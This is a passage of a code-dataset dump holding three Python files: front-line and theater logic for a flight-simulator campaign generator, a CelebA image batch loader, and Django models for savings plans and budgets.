str(group.name), group.position)\n control_point.captured = blue\n control_point.captured_invert = group.late_activation\n control_points[control_point.id] = control_point\n for group in self.carriers(blue):\n # TODO: Name the carrier.\n control_point = Carrier(\n \"carrier\", group.position, next(self.control_point_id))\n control_point.captured = blue\n control_point.captured_invert = group.late_activation\n control_points[control_point.id] = control_point\n for group in self.lhas(blue):\n # TODO: Name the LHA.\n control_point = Lha(\n \"lha\", group.position, next(self.control_point_id))\n control_point.captured = blue\n control_point.captured_invert = group.late_activation\n control_points[control_point.id] = control_point\n for group in self.fobs(blue):\n control_point = Fob(\n str(group.name), group.position, next(self.control_point_id)\n )\n control_point.captured = blue\n control_point.captured_invert = group.late_activation\n control_points[control_point.id] = control_point\n\n return control_points\n\n @property\n def front_line_path_groups(self) -> Iterator[VehicleGroup]:\n for group in self.country(blue=True).vehicle_group:\n if group.units[0].type == self.FRONT_LINE_UNIT_TYPE:\n yield group\n\n @cached_property\n def front_lines(self) -> Dict[str, ComplexFrontLine]:\n # Dict of front line ID to a front line.\n front_lines = {}\n for group in self.front_line_path_groups:\n # The unit will have its first waypoint at the source CP and the\n # final waypoint at the destination CP. Intermediate waypoints\n # define the curve of the front line.\n waypoints = [p.position for p in group.points]\n origin = self.theater.closest_control_point(waypoints[0])\n if origin is None:\n raise RuntimeError(\n f\"No control point near the first waypoint of {group.name}\")\n destination = self.theater.closest_control_point(waypoints[-1])\n if destination is None:\n raise RuntimeError(\n f\"No control point near the final waypoint of {group.name}\")\n\n # Snap the begin and end points to the control points.\n waypoints[0] = origin.position\n waypoints[-1] = destination.position\n front_line_id = f\"{origin.id}|{destination.id}\"\n front_lines[front_line_id] = ComplexFrontLine(origin, waypoints)\n self.control_points[origin.id].connect(\n self.control_points[destination.id])\n self.control_points[destination.id].connect(\n self.control_points[origin.id])\n return front_lines\n\n def objective_info(self, group: Group) -> Tuple[ControlPoint, int]:\n closest = self.theater.closest_control_point(group.position)\n distance = closest.position.distance_to_point(group.position)\n return closest, distance\n\n def add_preset_locations(self) -> None:\n for group in self.garrisons:\n closest, distance = self.objective_info(group)\n if distance < self.BASE_DEFENSE_RADIUS:\n closest.preset_locations.base_garrisons.append(group.position)\n else:\n logging.warning(\n f\"Found garrison unit too far from base: {group.name}\")\n\n for group in self.sams:\n closest, distance = self.objective_info(group)\n if distance < self.BASE_DEFENSE_RADIUS:\n closest.preset_locations.base_air_defense.append(group.position)\n else:\n closest.preset_locations.strike_locations.append(group.position)\n\n for group in self.ewrs:\n closest, distance = self.objective_info(group)\n closest.preset_locations.ewrs.append(group.position)\n\n for group in self.offshore_strike_targets:\n closest, distance = self.objective_info(group)\n closest.preset_locations.offshore_strike_locations.append(\n group.position)\n\n for group in self.ships:\n 
closest, distance = self.objective_info(group)\n closest.preset_locations.ships.append(group.position)\n\n for group in self.missile_sites:\n closest, distance = self.objective_info(group)\n closest.preset_locations.missile_sites.append(group.position)\n\n for group in self.coastal_defenses:\n closest, distance = self.objective_info(group)\n closest.preset_locations.coastal_defenses.append(group.position)\n\n for group in self.required_long_range_sams:\n closest, distance = self.objective_info(group)\n closest.preset_locations.required_long_range_sams.append(\n group.position\n )\n\n for group in self.required_medium_range_sams:\n closest, distance = self.objective_info(group)\n closest.preset_locations.required_medium_range_sams.append(\n group.position\n )\n\n def populate_theater(self) -> None:\n for control_point in self.control_points.values():\n self.theater.add_controlpoint(control_point)\n self.add_preset_locations()\n self.theater.set_frontline_data(self.front_lines)\n\n\n@dataclass\nclass ReferencePoint:\n world_coordinates: Point\n image_coordinates: Point\n\n\nclass ConflictTheater:\n terrain: Terrain\n\n reference_points: Tuple[ReferencePoint, ReferencePoint]\n overview_image: str\n landmap: Optional[Landmap]\n \"\"\"\n land_poly = None # type: Polygon\n \"\"\"\n daytime_map: Dict[str, Tuple[int, int]]\n _frontline_data: Optional[Dict[str, ComplexFrontLine]] = None\n\n def __init__(self):\n self.controlpoints: List[ControlPoint] = []\n self._frontline_data: Optional[Dict[str, ComplexFrontLine]] = None\n \"\"\"\n self.land_poly = geometry.Polygon(self.landmap[0][0])\n for x in self.landmap[1]:\n self.land_poly = self.land_poly.difference(geometry.Polygon(x))\n \"\"\"\n\n @property\n def frontline_data(self) -> Optional[Dict[str, ComplexFrontLine]]:\n if self._frontline_data is None:\n self.load_frontline_data_from_file()\n return self._frontline_data\n\n def load_frontline_data_from_file(self) -> None:\n if self._frontline_data is not None:\n logging.warning(\"Replacing existing frontline data from file\")\n self._frontline_data = FrontLine.load_json_frontlines(self)\n if self._frontline_data is None:\n self._frontline_data = {}\n\n def set_frontline_data(self, data: Dict[str, ComplexFrontLine]) -> None:\n if self._frontline_data is not None:\n logging.warning(\"Replacing existing frontline data\")\n self._frontline_data = data\n\n def add_controlpoint(self, point: ControlPoint,\n connected_to: Optional[List[ControlPoint]] = None):\n if connected_to is None:\n connected_to = []\n for connected_point in connected_to:\n point.connect(to=connected_point)\n\n self.controlpoints.append(point)\n\n def find_ground_objects_by_obj_name(self, obj_name):\n found = []\n for cp in self.controlpoints:\n for g in cp.ground_objects:\n if g.obj_name == obj_name:\n found.append(g)\n return found\n\n def is_in_sea(self, point: Point) -> bool:\n if not self.landmap:\n return False\n\n if self.is_on_land(point):\n return False\n\n for exclusion_zone in self.landmap[1]:\n if poly_contains(point.x, point.y, exclusion_zone):\n return False\n\n for sea in self.landmap[2]:\n if poly_contains(point.x, point.y, sea):\n return True\n\n return False\n\n def is_on_land(self, point: Point) -> bool:\n if not self.landmap:\n return True\n\n is_point_included = False\n for inclusion_zone in self.landmap[0]:\n if poly_contains(point.x, point.y, inclusion_zone):\n is_point_included = True\n\n if not is_point_included:\n return False\n\n for exclusion_zone in self.landmap[1]:\n if poly_contains(point.x, point.y, 
exclusion_zone):\n return False\n\n return True\n\n def nearest_land_pos(self, point: Point, extend_dist: int = 50) -> Point:\n \"\"\"Returns the nearest point inside a land exclusion zone from point\n `extend_dist` determines how far inside the zone the point should be placed\"\"\"\n if self.is_on_land(point):\n return point\n point = geometry.Point(point.x, point.y)\n nearest_points = []\n if not self.landmap:\n raise RuntimeError(\"Landmap not initialized\")\n for inclusion_zone in self.landmap[0]:\n nearest_pair = ops.nearest_points(point, inclusion_zone)\n nearest_points.append(nearest_pair[1])\n min_distance = point.distance(nearest_points[0]) # type: geometry.Point\n nearest_point = nearest_points[0] # type: geometry.Point\n for pt in nearest_points[1:]:\n distance = point.distance(pt)\n if distance < min_distance:\n min_distance = distance\n nearest_point = pt\n assert isinstance(nearest_point, geometry.Point)\n point = Point(point.x, point.y)\n nearest_point = Point(nearest_point.x, nearest_point.y)\n new_point = point.point_from_heading(\n point.heading_between_point(nearest_point),\n point.distance_to_point(nearest_point) + extend_dist\n )\n return new_point\n\n def control_points_for(self, player: bool) -> Iterator[ControlPoint]:\n for point in self.controlpoints:\n if point.captured == player:\n yield point\n\n def player_points(self) -> List[ControlPoint]:\n return list(self.control_points_for(player=True))\n\n def conflicts(self, from_player=True) -> Iterator[FrontLine]:\n for cp in [x for x in self.controlpoints if x.captured == from_player]:\n for connected_point in [x for x in cp.connected_points if x.captured != from_player]:\n yield FrontLine(cp, connected_point, self)\n\n def enemy_points(self) -> List[ControlPoint]:\n return list(self.control_points_for(player=False))\n\n def closest_control_point(self, point: Point) -> ControlPoint:\n closest = self.controlpoints[0]\n closest_distance = point.distance_to_point(closest.position)\n for control_point in self.controlpoints[1:]:\n distance = point.distance_to_point(control_point.position)\n if distance < closest_distance:\n closest = control_point\n closest_distance = distance\n return closest\n \n def closest_opposing_control_points(self) -> Tuple[ControlPoint, ControlPoint]:\n \"\"\"\n Returns a tuple of the two nearest opposing ControlPoints in theater.\n (player_cp, enemy_cp)\n \"\"\"\n all_cp_min_distances = {}\n for idx, control_point in enumerate(self.controlpoints):\n distances = {}\n closest_distance = None\n for i, cp in enumerate(self.controlpoints):\n if i != idx and cp.captured is not control_point.captured:\n dist = cp.position.distance_to_point(control_point.position)\n if not closest_distance:\n closest_distance = dist\n distances[cp.id] = dist\n if dist < closest_distance:\n distances[cp.id] = dist\n closest_cp_id = min(distances, key=distances.get) # type: ignore\n\n all_cp_min_distances[(control_point.id, closest_cp_id)] = distances[closest_cp_id]\n closest_opposing_cps = [\n self.find_control_point_by_id(i)\n for i\n in min(all_cp_min_distances, key=all_cp_min_distances.get) # type: ignore\n ] # type: List[ControlPoint]\n assert len(closest_opposing_cps) == 2\n if closest_opposing_cps[0].captured:\n return cast(Tuple[ControlPoint, ControlPoint], tuple(closest_opposing_cps))\n else:\n return cast(Tuple[ControlPoint, ControlPoint], tuple(reversed(closest_opposing_cps)))\n\n def find_control_point_by_id(self, id: int) -> ControlPoint:\n for i in self.controlpoints:\n if i.id == id:\n return i\n raise 
RuntimeError(f\"Cannot find ControlPoint with ID {id}\")\n\n def add_json_cp(self, theater, p: dict) -> ControlPoint:\n cp: ControlPoint\n if p[\"type\"] == \"airbase\":\n\n airbase = theater.terrain.airports[p[\"id\"]]\n\n if \"size\" in p.keys():\n size = p[\"size\"]\n else:\n size = SIZE_REGULAR\n\n if \"importance\" in p.keys():\n importance = p[\"importance\"]\n else:\n importance = IMPORTANCE_MEDIUM\n\n cp = Airfield(airbase, size, importance)\n elif p[\"type\"] == \"carrier\":\n cp = Carrier(\"carrier\", Point(p[\"x\"], p[\"y\"]), p[\"id\"])\n else:\n cp = Lha(\"lha\", Point(p[\"x\"], p[\"y\"]), p[\"id\"])\n\n if \"captured_invert\" in p.keys():\n cp.captured_invert = p[\"captured_invert\"]\n else:\n cp.captured_invert = False\n\n return cp\n \n @staticmethod\n def from_json(directory: Path, data: Dict[str, Any]) -> ConflictTheater:\n theaters = {\n \"Caucasus\": CaucasusTheater,\n \"Nevada\": NevadaTheater,\n \"Persian Gulf\": PersianGulfTheater,\n \"Normandy\": NormandyTheater,\n \"The Channel\": TheChannelTheater,\n \"Syria\": SyriaTheater,\n }\n theater = theaters[data[\"theater\"]]\n t = theater()\n\n miz = data.get(\"miz\", None)\n if miz is not None:\n MizCampaignLoader(directory / miz, t).populate_theater()\n return t\n\n cps = {}\n for p in data[\"player_points\"]:\n cp = t.add_json_cp(theater, p)\n cp.captured = True\n cps[p[\"id\"]] = cp\n t.add_controlpoint(cp)\n\n for p in data[\"enemy_points\"]:\n cp = t.add_json_cp(theater, p)\n cps[p[\"id\"]] = cp\n t.add_controlpoint(cp)\n\n for l in data[\"links\"]:\n cps[l[0]].connect(cps[l[1]])\n cps[l[1]].connect(cps[l[0]])\n\n return t\n \n\nclass CaucasusTheater(ConflictTheater):\n terrain = caucasus.Caucasus()\n overview_image = \"caumap.gif\"\n reference_points = (\n ReferencePoint(caucasus.Gelendzhik.position, Point(176, 298)),\n ReferencePoint(caucasus.Batumi.position, Point(1307, 1205)),\n )\n\n landmap = load_landmap(\"resources\\\\caulandmap.p\")\n daytime_map = {\n \"dawn\": (6, 9),\n \"day\": (9, 18),\n \"dusk\": (18, 20),\n \"night\": (0, 5),\n }\n\n\nclass PersianGulfTheater(ConflictTheater):\n terrain = persiangulf.PersianGulf()\n overview_image = \"persiangulf.gif\"\n reference_points = (\n ReferencePoint(persiangulf.Jiroft_Airport.position,\n Point(1692, 1343)),\n ReferencePoint(persiangulf.Liwa_Airbase.position, Point(358, 3238)),\n )\n landmap = load_landmap(\"resources\\\\gulflandmap.p\")\n daytime_map = {\n \"dawn\": (6, 8),\n \"day\": (8, 16),\n \"dusk\": (16, 18),\n \"night\": (0, 5),\n }\n\n\nclass NevadaTheater(ConflictTheater):\n terrain = nevada.Nevada()\n overview_image = \"nevada.gif\"\n reference_points = (\n ReferencePoint(nevada.Mina_Airport_3Q0.position, Point(252, 295)),\n ReferencePoint(nevada.Laughlin_Airport.position, Point(844, 909)),\n )\n landmap = load_landmap(\"resources\\\\nevlandmap.p\")\n daytime_map = {\n \"dawn\": (4, 6),\n \"day\": (6, 17),\n \"dusk\": (17, 18),\n \"night\": (0, 5),\n }\n\n\nclass NormandyTheater(ConflictTheater):\n terrain = normandy.Normandy()\n overview_image = \"normandy.gif\"\n reference_points = (\n ReferencePoint(normandy.Needs_Oar_Point.position, Point(515, 329)),\n ReferencePoint(normandy.Evreux.position, Point(2029, 1709)),\n )\n landmap = load_landmap(\"resources\\\\normandylandmap.p\")\n daytime_map = {\n \"dawn\": (6, 8),\n \"day\": (10, 17),\n \"dusk\": (17, 18),\n \"night\": (0, 5),\n }\n\n\nclass TheChannelTheater(ConflictTheater):\n terrain = thechannel.TheChannel()\n overview_image = \"thechannel.gif\"\n reference_points = (\n 
ReferencePoint(thechannel.Abbeville_Drucat.position, Point(2005, 2390)),\n ReferencePoint(thechannel.Detling.position, Point(706, 382))\n )\n landmap = load_landmap(\"resources\\\\channellandmap.p\")\n daytime_map = {\n \"dawn\": (6, 8),\n \"day\": (10, 17),\n \"dusk\": (17, 18),\n \"night\": (0, 5),\n }\n\n\nclass SyriaTheater(ConflictTheater):\n terrain = syria.Syria()\n overview_image = \"syria.gif\"\n reference_points = (\n ReferencePoint(syria.Eyn_Shemer.position, Point(564, 1289)),\n ReferencePoint(syria.Tabqa.position, Point(1329, 491)),\n )\n landmap = load_landmap(\"resources\\\\syrialandmap.p\")\n daytime_map = {\n \"dawn\": (6, 8),\n \"day\": (8, 16),\n \"dusk\": (16, 18),\n \"night\": (0, 5),\n }\n\n\n@dataclass\nclass ComplexFrontLine:\n \"\"\"\n Stores data necessary for building a multi-segment frontline.\n \"points\" should be ordered from closest to farthest distance originating from start_cp.position\n \"\"\"\n\n start_cp: ControlPoint\n points: List[Point]\n\n\n@dataclass\nclass FrontLineSegment:\n \"\"\"\n Describes a line segment of a FrontLine\n \"\"\"\n\n point_a: Point\n point_b: Point\n\n @property\n def attack_heading(self) -> Numeric:\n \"\"\"The heading of the frontline segment from player to enemy control point\"\"\"\n return self.point_a.heading_between_point(self.point_b)\n\n @property\n def attack_distance(self) -> Numeric:\n \"\"\"Length of the segment\"\"\"\n return self.point_a.distance_to_point(self.point_b)\n\n\nclass FrontLine(MissionTarget):\n \"\"\"Defines a front line location between two control points.\n Front lines are the area where ground combat happens.\n Overwrites the entirety of MissionTarget __init__ method to allow for\n dynamic position calculation.\n \"\"\"\n\n def __init__(\n self,\n control_point_a: ControlPoint,\n control_point_b: ControlPoint,\n theater: ConflictTheater\n ) -> None:\n self.control_point_a = control_point_a\n self.control_point_b = control_point_b\n self.segments: List[FrontLineSegment] = []\n self.theater = theater\n self._build_segments()\n self.name = f\"Front line {control_point_a}/{control_point_b}\"\n\n def is_friendly(self, to_player: bool) -> bool:\n \"\"\"Returns True if the objective is in friendly territory.\"\"\"\n return False\n\n def mission_types(self, for_player: bool) -> Iterator[FlightType]:\n yield from [\n FlightType.CAS,\n # TODO: FlightType.TROOP_TRANSPORT\n # TODO: FlightType.EVAC\n ]\n yield from super().mission_types(for_player)\n\n @property\n def position(self):\n \"\"\"\n The position where the conflict should occur\n according to the current strength of each control point.\n \"\"\"\n return self.point_from_a(self._position_distance)\n\n @property\n def control_points(self) -> Tuple[ControlPoint, ControlPoint]:\n \"\"\"Returns a tuple of the two control points.\"\"\"\n return self.control_point_a, self.control_point_b\n\n @property\n def attack_distance(self):\n \"\"\"The total distance of all segments\"\"\"\n return sum(i.attack_distance for i in self.segments)\n\n @property\n def attack_heading(self):\n \"\"\"The heading of the active attack segment from player to enemy control point\"\"\"\n return self.active_segment.attack_heading\n\n @property\n def active_segment(self) -> FrontLineSegment:\n \"\"\"The FrontLine segment where there can be an active conflict\"\"\"\n if self._position_distance <= self.segments[0].attack_distance:\n return self.segments[0]\n\n remaining_dist = self._position_distance\n for segment in self.segments:\n if remaining_dist <= segment.attack_distance:\n return 
segment\n else:\n remaining_dist -= segment.attack_distance\n logging.error(\n \"Frontline attack distance is greater than the sum of its segments\"\n )\n return self.segments[0]\n\n def point_from_a(self, distance: Numeric) -> Point:\n \"\"\"\n Returns a point {distance} away from control_point_a along the frontline segments.\n \"\"\"\n if distance < self.segments[0].attack_distance:\n return self.control_point_a.position.point_from_heading(\n self.segments[0].attack_heading, distance\n )\n remaining_dist = distance\n for segment in self.segments:\n if remaining_dist < segment.attack_distance:\n return segment.point_a.point_from_heading(\n segment.attack_heading, remaining_dist\n )\n else:\n remaining_dist -= segment.attack_distance\n\n @property\n def _position_distance(self) -> float:\n \"\"\"\n The distance from point \"a\" where the conflict should occur\n according to the current strength of each control point\n \"\"\"\n total_strength = (\n self.control_point_a.base.strength + self.control_point_b.base.strength\n )\n if self.control_point_a.base.strength == 0:\n return self._adjust_for_min_dist(0)\n if self.control_point_b.base.strength == 0:\n return self._adjust_for_min_dist(self.attack_distance)\n strength_pct = self.control_point_a.base.strength / total_strength\n return self._adjust_for_min_dist(strength_pct * self.attack_distance)\n\n def _adjust_for_min_dist(self, distance: Numeric) -> Numeric:\n \"\"\"\n Ensures the frontline conflict is never located within the minimum distance\n constant of either end control point.\n \"\"\"\n if (distance > self.attack_distance / 2) and (\n distance + FRONTLINE_MIN_CP_DISTANCE > self.attack_distance\n ):\n distance = self.attack_distance - FRONTLINE_MIN_CP_DISTANCE\n elif (distance < self.attack_distance / 2) and (\n distance < FRONTLINE_MIN_CP_DISTANCE\n ):\n distance = FRONTLINE_MIN_CP_DISTANCE\n return distance\n\n def _build_segments(self) -> None:\n \"\"\"Create line segments for the frontline\"\"\"\n control_point_ids = \"|\".join(\n [str(self.control_point_a.id), str(self.control_point_b.id)]\n ) # from_cp.id|to_cp.id\n reversed_cp_ids = \"|\".join(\n [str(self.control_point_b.id), str(self.control_point_a.id)]\n )\n complex_frontlines = self.theater.frontline_data\n if (complex_frontlines) and (\n (control_point_ids in complex_frontlines)\n or (reversed_cp_ids in complex_frontlines)\n ):\n # The frontline segments must be stored in the correct order for the distance algorithms to work.\n # The points in the frontline are ordered from the id before the | to the id after.\n # First, check if control point id pair matches in order, and create segments if a match is found.\n if control_point_ids in complex_frontlines:\n point_pairs = pairwise(complex_frontlines[control_point_ids].points)\n for i in point_pairs:\n self.segments.append(FrontLineSegment(i[0], i[1]))\n # Check the reverse order and build in reverse if found.\n elif reversed_cp_ids in complex_frontlines:\n point_pairs = pairwise(\n reversed(complex_frontlines[reversed_cp_ids].points)\n )\n for i in point_pairs:\n self.segments.append(FrontLineSegment(i[0], i[1]))\n # If no complex frontline has been configured, fall back to the old straight line method.\n else:\n self.segments.append(\n FrontLineSegment(\n self.control_point_a.position, self.control_point_b.position\n )\n )\n\n\n @staticmethod\n def load_json_frontlines(\n theater: ConflictTheater\n ) -> Optional[Dict[str, ComplexFrontLine]]:\n \"\"\"Load complex frontlines from json\"\"\"\n try:\n path = 
Path(f\"resources/frontlines/{theater.terrain.name.lower()}.json\")\n with open(path, \"r\") as file:\n logging.debug(f\"Loading frontline from {path}...\")\n data = json.load(file)\n return {\n frontline: ComplexFrontLine(\n data[frontline][\"start_cp\"],\n [Point(i[0], i[1]) for i in data[frontline][\"points\"]],\n )\n for frontline in data\n }\n except OSError:\n logging.warning(\n f\"Unable to load preset frontlines for {theater.terrain.name}\"\n )\n return None\n","sub_path":"game/theater/conflicttheater.py","file_name":"conflicttheater.py","file_ext":"py","file_size_in_byte":33952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12268011","text":"import numpy as np\nimport scipy.misc\nimport time\nimport os\n\ndef make_generator(path, image_list, batch_size):\n epoch_count = [1]\n\n def get_epoch():\n images = np.zeros((batch_size, 3, 64, 64), dtype='int32')\n random_state = np.random.RandomState(epoch_count[0])\n random_state.shuffle(image_list)\n epoch_count[0] += 1\n for n, image_name in enumerate(image_list):\n image = scipy.misc.imread(os.path.join(path, image_name))\n image = image[50:50+128, 25:25+128, :]\n image = scipy.misc.imresize(image, (64, 64))\n images[n % batch_size] = image.transpose(2, 0, 1)\n if n > 0 and n % batch_size == 0:\n yield (images,)\n return get_epoch\n\n\ndef get_train_validation_lists(data_dir):\n train_image_list = []\n val_image_list = []\n with open(os.path.join(data_dir, 'list_eval_partition.txt')) as f:\n for line in f:\n if int(line.split(' ')[1]) == 0:\n train_image_list.append(line.split(' ')[0])\n else:\n val_image_list.append(line.split(' ')[0])\n return train_image_list, val_image_list\n\n\ndef load(batch_size, data_dir='/home/ishaan/data/imagenet64'):\n train_list, val_list = get_train_validation_lists(data_dir)\n image_dir = os.path.join(data_dir, 'img_align_celeba')\n return (\n make_generator(image_dir, train_list, batch_size),\n make_generator(image_dir, val_list, batch_size)\n )\n\nif __name__ == '__main__':\n train_gen, valid_gen = load(64, data_dir='/cs/labs/yweiss/eitanrich/Datasets/CelebA/')\n t0 = time.time()\n for i, batch in enumerate(train_gen(), start=1):\n print(\"{}\\t{}\".format(str(time.time() - t0), batch[0][0,0,0,0]))\n if i == 1000:\n break\n t0 = time.time()\n","sub_path":"tflib/cropped_celeba.py","file_name":"cropped_celeba.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"238044256","text":"from django.db import models\nfrom django.db.models import Sum\n\nfrom simple_history.models import HistoricalRecords\n\nfrom movimentacao.models import ( Sistema,\n Favorecido,\n Conta,\n Movimento,\n Categoria,\n SubCategoria )\n\nfrom agendamento.models import ( Agenda,\n AgendaProg,\n AgendaValor )\n\nfrom movimentacao.functions import *\n\nclass Poupanca(models.Model):\n class Meta:\n verbose_name_plural = 'Poupanças'\n indexes = [\n models.Index(fields=['sistema', 'descricao']),\n models.Index(fields=['sistema', 'favorecido']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n favorecido = models.ForeignKey(Favorecido, on_delete=models.PROTECT)\n lembrete = models.ForeignKey(Agenda, on_delete=models.PROTECT, null=True)\n\n descricao = models.CharField('Descrição', max_length=60)\n \n history = HistoricalRecords()\n\n def save(self, *args, **kwargs):\n\n old_self = Poupanca.objects.filter(id=self.id).first()\n\n if hasattr(self, 'agendar') and 
hasattr(self, 'dados_ag') and self.agendar and not old_self:\n conta = Conta.objects.filter(id=self.dados_ag.split('|')[0]).first()\n ag = Agenda()\n ag.sistema = self.sistema\n ag.conta = conta\n ag.tipo = Movimento.TRANSFERENCIA\n ag.favorecido = self.favorecido\n ag.conta_transf = None\n ag.data_inicio = hoje()\n ag.data_fim = end_of_days\n ag.data_ultimo_pagto = hoje()\n ag.save()\n self.lembrete = ag\n p = AgendaProg()\n p.sistema = self.sistema\n p.agenda = ag\n p.tipo = AgendaProg.MENSAL\n p.valor = self.dados_ag.split('|')[1]\n p.save()\n p = AgendaProg()\n p.sistema = self.sistema\n p.agenda = ag\n p.tipo = AgendaProg.ADD_DIAS_UTEIS\n p.save()\n p = AgendaProg()\n p.sistema = self.sistema\n p.agenda = ag\n p.tipo = AgendaProg.ANUAL\n p.todos = True\n p.save()\n p = AgendaProg()\n p.sistema = self.sistema\n p.agenda = ag\n p.tipo = AgendaProg.DIA_NAO_UTIL\n p.valor = 1\n p.save()\n \n super(Poupanca, self).save(*args, **kwargs)\n\n def getValorData(self, data=hoje()):\n valor = 0\n for p_conta in PoupancaConta.objects.filter(sistema=self.sistema, poupanca=self).select_related('conta', 'conta__sistema', 'conta__moeda'):\n valor = valor + convMoeda(self.sistema, p_conta.conta.getSaldoData(data), p_conta.conta.moeda, self.sistema.moeda_sistema, data)\n return valor\n\n def getValorPrevistoData(self, data=hoje()):\n valor = 0\n p_ano_ini = PoupancaAno.objects.filter(sistema=self.sistema, poupanca=self).order_by('ano').first()\n data_ini = addDias(-1, formDate(p_ano_ini.ano, 1, 1))\n for p_conta in PoupancaConta.objects.filter(sistema=self.sistema, poupanca=self).select_related('conta', 'conta__sistema', 'conta__moeda'):\n ini_conta = convMoeda(self.sistema, p_conta.conta.getSaldoData(data_ini), p_conta.conta.moeda, self.sistema.moeda_sistema, data_ini)\n valor = valor + ini_conta\n for ano in range(p_ano_ini.ano, data.year + 1):\n p_ano = PoupancaAno.objects.filter(sistema=self.sistema, poupanca=self, ano=ano).first()\n if not p_ano:\n pass\n for mes in range(1, data.month + 1 if data.year == ano else 13):\n juro_mes = valor * (p_ano.perc_juros / 100)\n valor = valor + p_ano.valor_deposito + juro_mes\n p_mes = PoupancaAnoMes.objects.filter(sistema=self.sistema, poupanca_ano=p_ano, mes=mes).first()\n if p_mes:\n valor = valor + p_mes.valor_extra\n return valor\n\n def __str__(self):\n return self.descricao + ' [' + str(self.sistema) + ']'\n\nclass PoupancaConta(models.Model):\n class Meta:\n verbose_name_plural = 'Contas da Poupança'\n indexes = [\n models.Index(fields=['sistema', 'poupanca', 'conta']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n poupanca = models.ForeignKey(Poupanca, related_name='contas', on_delete=models.CASCADE)\n conta = models.ForeignKey(Conta, on_delete=models.PROTECT)\n \n principal = models.BooleanField('Principal', default=False)\n\n history = HistoricalRecords()\n\n def save(self, *args, **kwargs):\n\n old_self = PoupancaConta.objects.filter(id=self.id).first()\n \n super(PoupancaConta, self).save(*args, **kwargs)\n\n if self.principal and self.poupanca.lembrete and not self.poupanca.lembrete.conta_transf:\n self.poupanca.lembrete.conta_transf = self.conta\n self.poupanca.lembrete.save()\n \n def __str__(self):\n return self.poupanca.descricao + ' - ' + self.conta.descricao + ' [' + str(self.sistema) + ']'\n\nclass PoupancaAno(models.Model):\n class Meta:\n verbose_name_plural = 'Planejamento Anual da Poupança'\n indexes = [\n models.Index(fields=['sistema', 'poupanca', 'ano']),\n models.Index(fields=['sistema', 'ano']),\n ]\n\n 
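# One row per savings plan per year: valor_deposito is the fixed monthly\n    # deposit and perc_juros the monthly interest rate compounded by\n    # Poupanca.getValorPrevistoData().\n    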
sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n poupanca = models.ForeignKey(Poupanca, on_delete=models.CASCADE)\n\n ano = models.PositiveSmallIntegerField('Ano', default=0)\n valor_deposito = models.DecimalField('Valor Depósito', max_digits=10, decimal_places=2, default=0)\n perc_juros = models.DecimalField('% Juros', max_digits=5, decimal_places=2, default=0)\n\n history = HistoricalRecords()\n\n def save(self, *args, **kwargs):\n\n old_self = PoupancaAno.objects.filter(id=self.id).first()\n \n super(PoupancaAno, self).save(*args, **kwargs)\n\n if self.poupanca.lembrete:\n AgendaValor.objects.filter(sistema=self.sistema, agenda=self.poupanca.lembrete, valor=0).delete() \n valor = AgendaValor.objects.filter(sistema=self.sistema, agenda=self.poupanca.lembrete, data_inicio=formDate(self.ano, 1, 1)).first()\n if not valor:\n valor = AgendaValor()\n valor.sistema = self.sistema\n valor.agenda = self.poupanca.lembrete\n valor.data_inicio = formDate(self.ano, 1, 1)\n valor.data_fim = formDate(self.ano, 12, 31)\n valor.valor = -self.valor_deposito\n valor.save()\n \n def getValorTotal(self):\n soma = PoupancaAnoMes.objects.filter(sistema=self.sistema, poupanca_ano=self).aggregate(Sum('valor_extra'))['valor_extra__sum'] or 0\n return (self.valor_deposito * 12) + soma\n \n def __str__(self):\n return self.poupanca.descricao + ' - ' + str(self.ano) + ' [' + str(self.sistema) + ']'\n\nclass PoupancaAnoMes(models.Model):\n class Meta:\n verbose_name_plural = 'Valores Extras Mensais da Poupança'\n indexes = [\n models.Index(fields=['sistema', 'poupanca_ano', 'mes']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n poupanca_ano = models.ForeignKey(PoupancaAno, related_name='extras', on_delete=models.CASCADE)\n\n mes = models.PositiveSmallIntegerField('Mês', default=0)\n valor_extra = models.DecimalField('Valor Extra Mensal', max_digits=10, decimal_places=2, default=0)\n\n history = HistoricalRecords()\n \n def __str__(self):\n return self.poupanca_ano.poupanca.descricao + ' - ' + str(self.poupanca_ano.ano) + '/' + str(self.mes) + ' [' + str(self.sistema) + ']'\n\nclass Orcamento(models.Model):\n class Meta:\n verbose_name_plural = 'Orçamentos'\n indexes = [\n models.Index(fields=['sistema', 'ano']),\n ]\n\n sistema = models.ForeignKey(Sistema, on_delete=models.CASCADE)\n\n descricao = models.CharField('Descrição', max_length=60)\n ano = models.PositiveSmallIntegerField('Ano', default=0)\n\n history = HistoricalRecords()\n\n def getResumo(self, tipo):\n itens = OrcamentoItem.objects.filter(sistema=self.sistema, orcamento=self).select_related('sistema')\n return self.getResumo_aux(tipo, itens)\n\n def getResumo_aux(self, tipo, itens):\n soma = 0\n if tipo == 'Receita':\n for item in itens.filter(categoria__tipo=Categoria.RECEITA):\n soma += item.getValorTotal()\n outros = itens.filter(categoria=None, outros_rec=True).first()\n if outros:\n soma += outros.getValorTotal()\n elif tipo == 'Despesa':\n for item in itens.filter(categoria__tipo=Categoria.DESPESA):\n soma += item.getValorTotal()\n outros = itens.filter(categoria=None, conta=None, outros_rec=False).first()\n if outros:\n soma += outros.getValorTotal()\n elif tipo == 'Poupança':\n for item in itens.filter(conta__isnull=False):\n soma += item.getValorTotal()\n for econo_ano in PoupancaAno.objects.filter(sistema=self.sistema, ano=self.ano).select_related('sistema'):\n soma += econo_ano.getValorTotal()\n else:\n soma = self.getResumo_aux('Receita', itens) -\\\n self.getResumo_aux('Poupança', itens) -\\\n 
